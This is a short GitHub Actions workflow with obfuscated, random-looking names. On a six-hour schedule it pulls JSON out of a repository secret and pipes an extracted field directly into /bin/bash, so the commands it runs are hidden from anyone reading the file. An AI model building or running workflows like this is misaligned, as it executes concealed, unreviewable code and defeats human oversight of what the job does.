name: caoyukaiming

on:
  workflow_dispatch:
  schedule:
    - cron: '23 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caoyukaiming
        env:
          a29709: ${{ secrets.a29709 }}
        run: |
          echo $a29709 | jq -r .aufxp62 | /bin/bash
          echo $bydx99124 | jq -r .zwnxa46 | /bin/bash
          echo $z6 | jq -r .zbvq79 | /bin/bash

